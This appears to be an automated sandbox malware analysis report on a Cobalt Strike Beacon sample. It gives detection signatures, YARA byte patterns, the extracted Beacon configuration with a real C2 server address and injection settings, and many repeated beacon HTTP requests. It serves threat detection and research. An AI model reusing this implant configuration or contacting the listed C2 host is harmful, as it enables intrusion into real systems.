Edit tour

Windows Analysis Report
beacon_x64.exe

Overview

General Information

Sample name:	beacon_x64.exe
Analysis ID:	1587366
MD5:	af51e1dba9c7da4626ae4aac6e61a070
SHA1:	50bc787b1122f42e10c93814a51c8eee77d8d0bc
SHA256:	fca02dc798d591881b8f1eed5049339bca51fe7f6fffbda288076518da147e1b
Tags:	CobaltStrikeexeuser-lontze7
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found API chain indicative of debugger detection

Found direct / indirect Syscall (likely to bypass EDR)

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Contains functionality to call native functions

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

beacon_x64.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\beacon_x64.exe" MD5: AF51E1DBA9C7DA4626AE4AAC6E61A070)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus Earth Baxia FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x137:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x18990:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19cc1:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1c93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: beacon_x64.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Multi AV Scanner detection for submitted file

Source: beacon_x64.exe	ReversingLabs: Detection: 84%
Source: beacon_x64.exe	Virustotal: Detection: 79%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: beacon_x64.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\beacon_x64.exe

Code function: 4x nop then sub rsp, 28h

0_2_00402314

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 8.148.6.140

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd

Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: /Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
